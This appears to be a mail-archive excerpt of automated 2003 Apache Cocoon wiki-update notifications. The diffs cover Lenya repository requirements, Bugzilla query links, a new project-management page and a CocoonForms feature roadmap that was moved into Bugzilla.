[email protected] Subject: [WIKI-UPDATE] LenyaRepositoryRequirements BugzillaQueries Mon Dec 8 12:00:04 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=LenyaRepositoryRequirements , version: 7 on Mon Dec 8 10:09:47 2003 by RolfKulemann - !!!High priority ? - + !!!Highpriority - # Extensible metadata in order to reflect things like workflow as discussed here: http://article.gmane.org/gmane.comp.cms.lenya.devel/2005 + # Extensible metadata in order to reflect things like workflow as discussed here: [http://article.gmane.org/gmane.comp.cms.lenya.devel/2005] ? + + - # Moving of assets in the repository (without breaking contracts). The moving of assets can be implemented via metadata see 1.7.). See discussion here:\\ http://article.gmane.org/gmane.comp.cms.lenya.devel/2005\\ This requirement serves as basis to implement staging of assets. + # Moving of assets in the repository (without breaking contracts). The moving of assets can be implemented via metadata see 1.7.). See discussion here:\\ [http://article.gmane.org/gmane.comp.cms.lenya.devel/2005]\\ This requirement serves as basis to implement staging of assets. ? + + - !!!Medium Priority ? - + !!!MediumPriority - # Simple transaction features.Make sense when saving doc collections. Is an image a doc? I propose to use the term asset for all type of objects in the repository. Transactions seem to be useful for workflow if workflow is reflected/implemented via metadata of an asset. See discussion here:\\http://article.gmane.org/gmane.comp.cms.lenya.devel/2005 + # Simple transaction features.Make sense when saving doc collections. Is an image a doc? I propose to use the term asset for all type of objects in the repository. Transactions seem to be useful for workflow if workflow is reflected/implemented via metadata of an asset. See discussion here:\\[http://article.gmane.org/gmane.comp.cms.lenya.devel/2005] ? + + - !!! Low Priority ? - + !!! LowPriority - !!! Related Links + !!! OpenIssues - # http://marc.theaimsgroup.com/?t=107022316500003&r=1&w=2 - # http://thread.gmane.org/gmane.comp.cms.lenya.devel/1960 - # http://jcrep-jsr.day.com/content/playground/en.html + + !!! RelatedLinks + + # [http://marc.theaimsgroup.com/?t=107022316500003&r=1&w=2] + # [Thread in Lenya-Dev|http://thread.gmane.org/gmane.comp.cms.lenya.devel/1960] + # [JCR Playground|http://jcrep-jsr.day.com/content/playground/en.html] + Page: http://wiki.cocoondev.org/Wiki.jsp?page=BugzillaQueries , version: 4 on Mon Dec 8 10:24:34 2003 by ReinhardPoetz - !! CocoonForms + !!Cocoon Roadmap - * CocoonForms roadmap (using bugzilla dependencies to group issues together): + * __CocoonForms__ roadmap (using bugzilla dependencies to group issues together): ? ++ ++ + * __Flowscript__ roadmap (using bugzilla dependencies to group issues together): + ** [Overview|http://nagoya.apache.org/bugzilla/showdependencytree.cgi?id=25280] + **[Flowscript - next release|http://nagoya.apache.org/bugzilla/showdependencytree.cgi?id=25283] - all issues necessary for the next release of Flowscript + **[Flowscript - future releases|http://nagoya.apache.org/bugzilla/showdependencytree.cgi?id=25284] - all issues NOT necessary for the next (=first) release of Flowscript From [email protected] Mon Dec 08 12:00:08 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 95548 invoked from network); 8 Dec 2003 12:00:08 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 8 Dec 2003 12:00:08 -0000 Received: (qmail 78764 invoked by uid 500); 8 Dec 2003 12:00:07 -0000 Delivered-To: [email protected] Received: (qmail 78605 invoked by uid 500); 8 Dec 2003 12:00:05 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 78589 invoked from network); 8 Dec 2003 12:00:05 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 8 Dec 2003 12:00:05 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB8C04p26795 for <[email protected]>; Mon, 8 Dec 2003 13:00:04 +0100 Date: Mon, 8 Dec 2003 13:00:04 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] BugzillaQueries Mon Dec 8 13:00:04 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=BugzillaQueries , version: 6 on Mon Dec 8 12:00:48 2003 by ReinhardPoetz - *[add a new Cocoon2/CocoonForms issue|http://nagoya.apache.org/bugzilla/enter_bug.cgi?reporter=reinhard%40apache.org&product=Cocoon+2&version=Current+CVS+2.1&component=CocoonForms&rep_platform=Other&op_sys=other&priority=Other&bug_severity=Enhancement&bug_status=NEW&assigned_to=&cc=&bug_file_loc=http%3A%2F%2F&short_desc=&comment=&maketemplate=Remember+values+as+bookmarkable+template&form_name=enter_bug] ? ------------- + *[add a new Cocoon2/CocoonForms issue|http://nagoya.apache.org/bugzilla/enter_bug.cgi?reporter=reinhard%40apache.org&product=Cocoon+2&version=Current+CVS+2.1&component=CocoonForms&rep_platform=Other&op_sys=other&priority=Other&bug_severity=Enhancement&bug_status=NEW&assigned_to=&cc=&bug_file_loc=&short_desc=&comment=&maketemplate=Remember+values+as+bookmarkable+template&form_name=enter_bug] From [email protected] Mon Dec 08 13:00:09 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 25965 invoked from network); 8 Dec 2003 13:00:09 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 8 Dec 2003 13:00:09 -0000 Received: (qmail 58240 invoked by uid 500); 8 Dec 2003 13:00:06 -0000 Delivered-To: [email protected] Received: (qmail 58209 invoked by uid 500); 8 Dec 2003 13:00:06 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 58095 invoked from network); 8 Dec 2003 13:00:03 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 8 Dec 2003 13:00:03 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB8D03p26826 for <[email protected]>; Mon, 8 Dec 2003 14:00:03 +0100 Date: Mon, 8 Dec 2003 14:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] BugzillaQueries Mon Dec 8 14:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=BugzillaQueries , version: 6 on Mon Dec 8 12:00:48 2003 by ReinhardPoetz - *[add a new Cocoon2/CocoonForms issue|http://nagoya.apache.org/bugzilla/enter_bug.cgi?reporter=reinhard%40apache.org&product=Cocoon+2&version=Current+CVS+2.1&component=CocoonForms&rep_platform=Other&op_sys=other&priority=Other&bug_severity=Enhancement&bug_status=NEW&assigned_to=&cc=&bug_file_loc=http%3A%2F%2F&short_desc=&comment=&maketemplate=Remember+values+as+bookmarkable+template&form_name=enter_bug] ? ------------- + *[add a new Cocoon2/CocoonForms issue|http://nagoya.apache.org/bugzilla/enter_bug.cgi?reporter=reinhard%40apache.org&product=Cocoon+2&version=Current+CVS+2.1&component=CocoonForms&rep_platform=Other&op_sys=other&priority=Other&bug_severity=Enhancement&bug_status=NEW&assigned_to=&cc=&bug_file_loc=&short_desc=&comment=&maketemplate=Remember+values+as+bookmarkable+template&form_name=enter_bug] From [email protected] Mon Dec 08 14:00:17 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 56374 invoked from network); 8 Dec 2003 14:00:17 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 8 Dec 2003 14:00:17 -0000 Received: (qmail 41473 invoked by uid 500); 8 Dec 2003 14:00:13 -0000 Delivered-To: [email protected] Received: (qmail 41454 invoked by uid 500); 8 Dec 2003 14:00:13 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 41247 invoked from network); 8 Dec 2003 14:00:11 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 8 Dec 2003 14:00:11 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB8E0Bp26854 for <[email protected]>; Mon, 8 Dec 2003 15:00:11 +0100 Date: Mon, 8 Dec 2003 15:00:11 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] ProjectManagement Main CocoonFormsRoadmap LeftMenu BugzillaQueries Mon Dec 8 15:00:11 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=ProjectManagement , version: 1 on Mon Dec 8 14:03:06 2003 by ReinhardPoetz New page created: + Summary of instruments we use to manage the Cocoon project: + + !!Issue tracking + We use [Bugzilla|http://nagaoya.apache.org/bugzilla] as issue tracking tool which we use for three different tasks. Find here our guidelines [how we use Bugzilla|HowWeUseBugzilla] especially the differnet meanings of the issue states. + *__Bug tracking__ + **[add a new bug|http://nagoya.apache.org/bugzilla/enter_bug.cgi?product=Cocoon%202] (direct link) + **[list of all open bugs|http://nagoya.apache.org/bugzilla/buglist.cgi?bug_status=NEW&bug_status=ASSIGNED&bug_status=REOPENED&bug_severity=Blocker&bug_severity=Critical&bug_severity=Major&bug_severity=Normal&bug_severity=Minor&email1=&emailtype1=substring&emailassigned_to1=1&email2=&emailtype2=substring&emailreporter2=1&bugidtype=include&bug_id=&changedin=&votes=&chfieldfrom=&chfieldto=Now&chfieldvalue=&product=Cocoon+2&short_desc=&short_desc_type=allwordssubstr&long_desc=&long_desc_type=allwordssubstr&bug_file_loc=&bug_file_loc_type=allwordssubstr&keywords=&keywords_type=anywords&field0-0-0=short_desc&type0-0-0=notsubstring&value0-0-0=%5BPatch%5D&field0-0-1=noop&type0-0-1=noop&value0-0-1=&cmdtype=doit&newqueryname=&order=Reuse+same+sort+as+last+time] + **[list of all blocker bugs|http://nagoya.apache.org/bugzilla/buglist.cgi?bug_status=NEW&bug_status=ASSIGNED&bug_status=REOPENED&bug_severity=Blocker&email1=&emailtype1=substring&emailassigned_to1=1&email2=&emailtype2=substring&emailreporter2=1&bugidtype=include&bug_id=&changedin=&votes=&chfieldfrom=&chfieldto=Now&chfieldvalue=&product=Cocoon+2&short_desc=&short_desc_type=allwordssubstr&long_desc=&long_desc_type=allwordssubstr&bug_file_loc=&bug_file_loc_type=allwordssubstr&keywords=&keywords_type=anywords&field0-0-0=short_desc&type0-0-0=notsubstring&value0-0-0=%5BPatch%5D&field0-0-1=noop&type0-0-1=noop&value0-0-1=&field0-1-0=noop&type0-1-0=noop&value0-1-0=&cmdtype=doit&newqueryname=&order=Reuse+same+sort+as+last+time] + these blocks definitly stopy a release because of broken core functionality + *__Patches__ + **[add a new patch|http://nagoya.apache.org/bugzilla/enter_bug.cgi?reporter=&product=Cocoon+2&version=Current+CVS+2.1&component=core&rep_platform=Other&op_sys=other&priority=Other&bug_severity=Enhancement&bug_status=NEW&assigned_to=&cc=&bug_file_loc=&short_desc=%5BPatch%5D&comment=&maketemplate=Remember+values+as+bookmarkable+template&form_name=enter_bug] + **[list of all provided patches|http://nagoya.apache.org/bugzilla/buglist.cgi?bug_status=NEW&bug_status=ASSIGNED&bug_status=REOPENED&bug_severity=Blocker&bug_severity=Critical&bug_severity=Major&bug_severity=Normal&bug_severity=Minor&bug_severity=Enhancement&email1=&emailtype1=substring&emailassigned_to1=1&email2=&emailtype2=substring&emailreporter2=1&bugidtype=include&bug_id=&changedin=&votes=&chfieldfrom=&chfieldto=Now&chfieldvalue=&product=Cocoon+2&short_desc=&short_desc_type=allwordssubstr&long_desc=&long_desc_type=allwordssubstr&bug_file_loc=&bug_file_loc_type=allwordssubstr&keywords=&keywords_type=anywords&field0-0-0=short_desc&type0-0-0=substring&value0-0-0=%5BPatch%5D&field0-0-1=noop&type0-0-1=noop&value0-0-1=&cmdtype=doit&newqueryname=&order=Reuse+same+sort+as+last+time] + *__Roadmap planing__ + **[Cocoon Roadmap|http://nagoya.apache.org/bugzilla/showdependencytree.cgi?id=25320] (the complete Cocoon2 roadmap) + ***[Issues for the next release|http://nagoya.apache.org/bugzilla/showdependencytree.cgi?id=25321] + ***[Issues for future releases|http://nagoya.apache.org/bugzilla/showdependencytree.cgi?id=25322] + **[add a new enhancement issue|http://nagoya.apache.org/bugzilla/enter_bug.cgi?reporter=&product=Cocoon+2&version=Current+CVS+2.1&rep_platform=Other&op_sys=other&priority=Other&bug_severity=Enhancement&bug_status=NEW&assigned_to=&cc=&bug_file_loc=&short_desc=&comment=&maketemplate=Remember+values+as+bookmarkable+template&form_name=enter_bug] + **Partial roadmaps + ***[CocoonForms|http://nagoya.apache.org/bugzilla/showdependencytree.cgi?id=25099] + ***[Flowscript|http://nagoya.apache.org/bugzilla/showdependencytree.cgi?id=25280] + *Utilities + **[issues that changed in the last 2 days|http://nagoya.apache.org/bugzilla/buglist.cgi?changedin=2&bug_status=UNCONFIRMED&bug_status=NEW&bug_status=ASSIGNED&bug_status=REOPENED&bug_status=RESOLVED&bug_status=VERIFIED&bug_status=CLOSED&email1=&emailtype1=substring&emailassigned_to1=1&email2=&emailtype2=substring&emailreporter2=1&bugidtype=include&bug_id=&votes=&chfieldfrom=&chfieldto=Now&chfieldvalue=&product=Cocoon+2&short_desc=&short_desc_type=allwordssubstr&long_desc=&long_desc_type=allwordssubstr&bug_file_loc=&bug_file_loc_type=allwordssubstr&keywords=&keywords_type=anywords&field0-0-0=noop&type0-0-0=noop&value0-0-0=&cmdtype=doit&namedcmd=Cocoon14&newqueryname=&order=%27Importance%27] + **[issues that changed ini the last 7 days|http://nagoya.apache.org/bugzilla/buglist.cgi?changedin=7&bug_status=UNCONFIRMED&bug_status=NEW&bug_status=ASSIGNED&bug_status=REOPENED&bug_status=RESOLVED&bug_status=VERIFIED&bug_status=CLOSED&email1=&emailtype1=substring&emailassigned_to1=1&email2=&emailtype2=substring&emailreporter2=1&bugidtype=include&bug_id=&votes=&chfieldfrom=&chfieldto=Now&chfieldvalue=&product=Cocoon+2&short_desc=&short_desc_type=allwordssubstr&long_desc=&long_desc_type=allwordssubstr&bug_file_loc=&bug_file_loc_type=allwordssubstr&keywords=&keywords_type=anywords&field0-0-0=noop&type0-0-0=noop&value0-0-0=&cmdtype=doit&namedcmd=Cocoon14&newqueryname=&order=%27Importance%27] + + !!Mailing lists + We use [mailing lists|http://cocoon.apache.org/2.1/installing/index.html#Getting+Apache+Cocoon] as our central communication tool. Also checkout the [archives|http://cocoon.apache.org/community/mail-archives.html] + + !!Code repository + We use CVS as our code repository. [Here|http://cvs.apache.org/viewcvs.cgi/cocoon-2.1/] you can access it using a browser. To get a working copy you checkout this [information|http://cocoon.apache.org/2.1/installing/index.html#Getting+Apache+Cocoon] + + !!Virtual Meetings + Every [first friday|FirstFriday] in a month we meet for 'virtual hackatons'. + + !!Documentation + As you found this page you already know that we have set up a Wiki for our documentation. If you want to add docs to the official documentation have a look at our [Documentation HowTo|http://cocoon.apache.org/2.1/howto/index.html#Documentation]. + + !!Release management + [How to release Cocoon|http://wiki.cocoondev.org/Wiki.jsp?page=CocoonReleaseHowTo] + + !!Cocoon WebSite + [How to update our website|http://wiki.cocoondev.org/Wiki.jsp?page=CocoonWebsiteUpdate] + Page: http://wiki.cocoondev.org/Wiki.jsp?page=Main , version: 311 on Mon Dec 8 14:05:42 2003 by ReinhardPoetz + * December 8, 2003 + ** How me [manage|ProjectManagement] the Cocoon project --[ReinhardPoetz] Page: http://wiki.cocoondev.org/Wiki.jsp?page=CocoonFormsRoadmap , version: 12 on Mon Dec 8 14:08:03 2003 by ReinhardPoetz + The [CocoonForms roadmap|http://nagoya.apache.org/bugzilla/showdependencytree.cgi?id=25099] has moved into Bugzilla. - !!!Introduction - Cocoon Forms seems to be the hottest topic in the Cocoon community - at least - I got this impression after following the Cocoon mail-lists. - Thanks to the great efforts of Bruno, Sylvain, Marc, Antonio, Jeremy and some others - we already have a great solution. But there are still a few issues - open to mark Cocoon Forms as stable finally. - - This document should help to - *collect all open issues preventing us from a stable release - *transform these open issues into a roadmap that shows our users - what they can expect and to get a feeling how long it will take - until they get a stable block - *get an overview who is working on which item - - !!What can you do if you find this page? - *add new items to the todo list - *vote for a certain feature (see the voting rules below) - *but __don't__ add items to the roadmap section because - we decide on them 'together' on [email protected] - *add your name to the __who__ paragraph in one of the items - (this is no legal committment but it should show others that - somebody else is working on a certain feature - if you don't have - time to do it, please add a note or simply delete your name) - - !!Rules - *Everybody can add his requirements into the 'ToDo'-section of this - document. On cocoon-dev we discuss the roadmap and add the open - issues into the according category (either first stable release or - later release). - - *Everybody can add his vote to an issue of the 'ToDo'-section so that - we get a feeling what is required (earlier). - **+1 means: absolutly necessary for the first stable release - **+0 means: not necessary now - **-1 means: I don't want to see this feature being part of CocoonForms - - - !!!Cocoon Forms Roadmap - - - !!First stable release - TBD - - !!Later releases - TBD - - !!Rejected features - TBD - - !!!ToDo's - - [1] move Woody into CocoonForms block \\ - [2] support for multi-page forms \\ - [3] general review of all XML elements \\ - [4] datatypes repository \\ - [5] JXTemplate: add a CocoonForms taglib \\ - [6] Multi-sources binding \\ - [7] use another expression language (replace xReporter expressions) \\ - [8] widgets \\ - [9] styles \\ - [10] widget interface: setValidationError \\ - [11] calculated fields \\ - [12] default values for fields \\ - [13] checking validity of id's \\ - [14] Subforms \\ - [15] Utility checking form definition and form template \\ - [16] Enhanced validation for selection lists \\ - [17] AggregateField \\ - [18] woody form-model - JavaScript model \\ - [19] binding isolation woody model \\ - [20] cache compiled bindings \\ - [21] enum convertor \\ - [22] widget definition reuse \\ - [23] template and markup reuse \\ - [24] namespaced widgets \\ - [25] dynamically create and switch between sets of widgets \\ - [26] clean up samples\\ - [27] improve documentation\\ - [28] form state info\\ - [29] repeater row ordening\\ - [30] extended lookups\\ - [31] multiple templates - partial/secure submits\\ - [32] dynamic addressing of widgets\\ - - - ![#1] move Woody into CocoonForms block - (rename all packages, namespaces and namespace-prefixes) - - who: ?\\ - status: open\\ - vote: +1 (RP),\\ - - ---- - - ![#2] support for multi-page forms - - who: [ReinhardPoetz] (start in december with it, but no promise ;-) - status: open\\ - vote: +1 (RP), +1 ([AH|AndreasHochsteger]), +1 ([UC|UgoCei])\\ - - ---- - - ![#3] general review of all XML elements - - Is our naming consistent? Are there better element/attribute names?\\ - see [XML formats|WoodyFileFormats]\\ - - who: ?\\ - status: open\\ - vote: +1 (RP), +1 ([AH|AndreasHochsteger])\\ - - ---- - - ![#4] datatypes repository - - who: ?\\ - status: open\\ - vote: +0.5 (RP), +1 ([AH|AndreasHochsteger])\\ - - ---- - - ![#5] JXTemplate: add a CocoonForms taglib - - who: ?\\ - status: open - vote: +1 (RP), +1 ([AH|AndreasHochsteger])\\ - - ---- - - ![#6] Multi-sources binding - - make it possible to bind more than one source (bean, xml-document, ...) - at least we need a recommendation how to handle this (this could also - be to create one 'big' bean that contains all values - - reported by: [Reinhard Poetz]\\ - who: ?\\ - status: open\\ - vote: +1 (RP), +1 ([AH|AndreasHochsteger])\\ - - ---- - - ![#7] use another expression language (replace xReporter expressions) - - evaluate other, more standard, expression engines such as Jexl and JXPath - and compare with the currently used xreporter-expression package.\\ - - who: ?\\ - status: open\\ - vote: +1 (RP), +1 ([AH|AndreasHochsteger]), +1 ([UC|UgoCei])\\ - - ---- - - ![#8] widgets - *widget for semi-structured content - who:?\\ - status: open\\ - vote: +1 (RP), +1 ([UC|UgoCei])\\ - *tree widget\\ - who:?\\ - status: open \\ - vote: +0 (RP), \\ - *validation widget\\ - validation widget: a widget that has no value of its own, but just serves - to perform validation on or between other widgets (for validation rules that - don't belong to a specific widget).\\ - who:?\\ - status: open\\ - vote: +1 (RP), \\ - - ---- - - ![#9] styles - [#9a] refactoring current styles - for making extension simpler ... - - who: [JH|JoergHeinicke] (but probably without enough time in the next weeks, months)\\ - status: open\\ - vote: +0 (RP), +1 ([AH|AndreasHochsteger]), +1 ([UC|UgoCei])\\ - - [#9b] add support for XUL, simple HTML, ... - - who: [JH|JoergHeinicke] (but probably without enough time in the next weeks, months)\\ - status: open\\ - vote: +0 (RP),\\ - - ---- - - ![#10] widget interface: setValidationError - Add an setValidationError or addValidationError method to the Widget interface - - who:?\\ - status: (partly done: the field widget already has this)\\ - vote: \\ - - ---- - - ![#11] calculated fields - - who:?\\ - status: open\\ - vote: +0 (RP), +1 ([AH|AndreasHochsteger])\\ - - ---- - - ![#12] default values for fields - - who:?\\ - status: open\\ - vote: +1 (RP), +1 ([AH|AndreasHochsteger])\\ - - ---- - - ![#13] checking validity of id's - (should not contain spaces or dots, or characters not allowed in request parameters) - - who:?\\ - status: open\\ - vote: +1 (RP), - - ---- - - ![#14] Subforms - Including one form in another form\\ - who:?\\ - status: open \\ - vote: +0 (RP), - - ---- - - ![#15] Utility checking form definition and form template - make an utility that checks that all (required) fields defined in the - form definition are present in the form layout template\\ - - who:?\\ - status: open \\ - vote: -0.5 (RP - don't know if this is possible if we have a global datatype repository), - - ---- - - ![#16] Enhanced validation for selection lists - for fields with a selection list, it should be checked that the submitted - value is effectively in the selection list (to avoid problems with people playing - with request parameters). Since this could potentially be expensive (if the - selection list is dynamically generated), maybe do this as a seperate validation rule. - - who:?\\ - status: open \\ - vote: +0 (RP)\\ - - ---- - - ![#17] AggregateField - adapt the AggregateField so it can aggregate the other way around as - well (see [mail-list-proposal|http://marc.theaimsgroup.com/?l=xml-cocoon-dev&m=105712568410208&w=2]) - - requested by: [mpo|MarcPortier]\\ - who:?\\ - - status: open \\ - vote: +0 (RP) \\ - - ---- - - ![#18] woody form-model - JavaScript model - think about transfering (part of) the woody form-model information over to the - client as a javascript model that can be interpreted by a set of client-side - javascript functions inside the browser\\ - requested by: [mpo|MarcPortier]\\ - who:?\\ - status: open \\ - +vote: \\ - - ---- - - ![#19] binding isolation woody model - make the 'binding' isolate the woody model from the business model - --> fieldbinding should perform a clone() - - requested by: [mpo|MarcPortier]\\ - who:?\\ - status: open \\ - vote: \\ - - ---- - - ![#20] cache compiled bindings - - who:?\\ - status: open \\ - vote: \\ - - ---- - - ![#21] enum convertor - create an "enum" base type and an "enum" convertor for types that - implement the [TypesafeEnumPattern|http://developer.java.sun.com/developer/Books/shiftintojava/page1.html#replaceenums] - - requested by: [ugo|UgoCei]\\ - who: [ugo|UgoCei]\\ - status: done\\ - vote: \\ - - ---- - - ![#22] widget definition reuse - - create a way to define sets of widget definitions and a way to - reference the sets to reuse them multiple times in a form definition - - requested by: [tim|TimLarson]\\ - who: [tim|TimLarson]\\ - status: patch posted at [TimLarson]\\ - vote: +1 ([AH|AndreasHochsteger])\\ - - ---- - - ![#23] template and markup reuse - - create a way to define sets of templates and markup and a way to - reference the sets to reuse them multiple times in a form template - - requested by: [tim|TimLarson]\\ - who: [tim|TimLarson]\\ - status: patch posted at [TimLarson]\\ - vote: +1 ([AH|AndreasHochsteger])\\ - - ---- - - ![#24] namespaced widgets - - create a way to wrap a set of widgets in a namespace to allow - their widget ids to be reused multiple times in a form - - requested by: [tim|TimLarson]\\ - who: [tim|TimLarson]\\ - status: patch posted at [TimLarson]\\ - vote:\\ - - ---- - - ![#25] dynamically create and switch between sets of widgets - - create a way to have staticly specified sets of widgets created - dynamically on demand and a way to control which set of widgets - (with corresponding templates and markup) is processed and displayed. - - requested by: [tim|TimLarson]\\ - who: [tim|TimLarson]\\ - status: preliminary patch posted at [TimLarson], changes coming\\ - vote:\\ - - ---- - - ![#26] clean up samples - - the samples can use some cleanup. I'm thinking of: - * renaming the form1 sample to "widgetdemo", renaming the form2 sample to "bindingdemo" - * move each sample to a seperate subdir, with its own sitemap, to avoid complexity for anyone trying to find out how things fit together - * remove use of XSP except for the action-based demo - - requested by: [Bruno|BrunoDumon]\\ - who: open\\ - status: open\\ - vote: +1 ([AH|AndreasHochsteger])\\ - - ---- - - ![#27] improve documentation - - Docs can always be better. - - requested by: [Bruno|BrunoDumon]\\ - who: [Bruno|BrunoDumon], ...\\ - status: in continuous progress\\ - vote: +1 ([AH|AndreasHochsteger])\\ - - ---- - - ![#28] form state info - - a way to retrieve state information from a form - * in general: which tab, which view, which widget is currently selected - * for repeaters: cursor info to know which row is active and to introduce functions like NextRow, PrevRow, FirstRow and LastRow - - requested by: Danny Bols\\ - who: open\\ - status: open\\ - vote: +1 (DB)\\ - - ---- - - ![#29] repeater row ordening - - clickable row headers for sorting repeater rows - - requested by: Danny Bols\\ - who: open\\ - status: open\\ - vote: +1 ([AH|AndreasHochsteger])\\ - - ---- - - ![#30] extended lookups - - a combo box is a simple way to lookup a value and has a number of limitations; - an extended lookup should deal with these limitations; - the idea is to activate a new page in which one has more control over the interaction; \\ - aspects: - * no limitations to the number of rows in a list (in big lists one can use a pagination like interaction) - * multiple columns and control over which columns are shown and which are not - * control over filtering and ordening of rows - * returning multiple key values instead of only one key value - * lists will only be populated when they are requested for and are not a part of the source page like combo boxes - - requested by: Danny Bols\\ - who: open\\ - status: open\\ - vote: +1 ([UC|UgoCei])\\ - - ---- - - ![#31] multiple templates - partial/secure submits - - * multiple templates(views) for one form to allow switching between certain views like user/service/admin view or list/detail view etc (see also [23]) - * partial submits: submitting a subset of all the widgets without overwriting the other widgets with null values (see also [this thread|http://marc.theaimsgroup.com/?t=106931615400001&r=1&w=2]) - * secure submits: checking the "to-expect" widgets in the request string upon sumbit (see also [15]) - - - requested by: Danny Bols\\ - who: open\\ - status: open\\ - vote: +1 (DB), +1 ([AH|AndreasHochsteger]), +1 ([UC|UgoCei])\\ - - - ---- - - ![#32] dynamic addressing of widgets - - in order to be able to design dynamic templates(views) for a form all widgets in a form instance should be addressable using JxPath-like expressions; - something like: <wt:widget id="repeater1/row[[3]/repeater2/row[[4]/widgetname"/> - (see also [this thread|http://marc.theaimsgroup.com/?t=106922746300002&r=1&w=2]) - * related to this: extending the form api so all widgets (and validation messages) are itteratable - - - requested by: Danny Bols\\ - who: open\\ - status: open\\ - vote: +1 (DB), +1 ([AH|AndreasHochsteger])\\ - Page: http://wiki.cocoondev.org/Wiki.jsp?page=LeftMenu , version: 102 on Mon Dec 8 13:11:30 2003 by ReinhardPoetz + __[ProjectManagement]__\\ + ---- Page: http://wiki.cocoondev.org/Wiki.jsp?page=BugzillaQueries , version: 7 on Mon Dec 8 14:09:26 2003 by ReinhardPoetz - Here are a few __standard__ queries for everyday use: + This document has become part of our general [ProjectManagement] information page. - !! Lists of bugs - * Open Cocoon2 bugs: [bugs only|http://nagoya.apache.org/bugzilla/buglist.cgi?bug_status=NEW&bug_status=ASSIGNED&bug_status=REOPENED&bug_severity=Blocker&bug_severity=Critical&bug_severity=Major&bug_severity=Normal&bug_severity=Minor&email1=&emailtype1=substring&emailassigned_to1=1&email2=&emailtype2=substring&emailreporter2=1&bugidtype=include&bug_id=&changedin=&votes=&chfieldfrom=&chfieldto=Now&chfieldvalue=&product=Cocoon+2&short_desc=&short_desc_type=allwordssubstr&long_desc=&long_desc_type=allwordssubstr&bug_file_loc=&bug_file_loc_type=allwordssubstr&keywords=&keywords_type=anywords&field0-0-0=short_desc&type0-0-0=notsubstring&value0-0-0=%5BPatch%5D&field0-0-1=noop&type0-0-1=noop&value0-0-1=&cmdtype=doit&newqueryname=&order=Reuse+same+sort+as+last+time] , [all issues|http://nagoya.apache.org/bugzilla/buglist.cgi?bug_status=UNCONFIRMED&bug_status=NEW&bug_status=ASSIGNED&bug_status=REOPENED&email1=&emailtype1=substring&emailassigned_to1=1&email2=&emailtype2=substring&em! ailreporter2=1&bugidtype=include&bug_id=&changedin=&votes=&chfieldfrom=&chfieldto=Now&chfieldvalue=&product=Cocoon+2&short_desc=&short_desc_type=allwordssubstr&long_desc=&long_desc_type=allwordssubstr&bug_file_loc=&bug_file_loc_type=allwordssubstr&keywords=&keywords_type=anywords&field0-0-0=noop&type0-0-0=noop&value0-0-0=&cmdtype=doit&namedcmd=CocoonOpenIssues&newqueryname=&order=Reuse+same+sort+as+last+time] (the first query doesn't include patches and enhancements, only bugs) - *[all provided patches|http://nagoya.apache.org/bugzilla/buglist.cgi?bug_status=NEW&bug_status=ASSIGNED&bug_status=REOPENED&bug_severity=Blocker&bug_severity=Critical&bug_severity=Major&bug_severity=Normal&bug_severity=Minor&bug_severity=Enhancement&email1=&emailtype1=substring&emailassigned_to1=1&email2=&emailtype2=substring&emailreporter2=1&bugidtype=include&bug_id=&changedin=&votes=&chfieldfrom=&chfieldto=Now&chfieldvalue=&product=Cocoon+2&short_desc=&short_desc_type=allwordssubstr&long_desc=&long_desc_type=allwordssubstr&bug_file_loc=&bug_file_loc_type=allwordssubstr&keywords=&keywords_type=anywords&field0-0-0=short_desc&type0-0-0=substring&value0-0-0=%5BPatch%5D&field0-0-1=noop&type0-0-1=noop&value0-0-1=&cmdtype=doit&newqueryname=&order=Reuse+same+sort+as+last+time] - *[all assigned 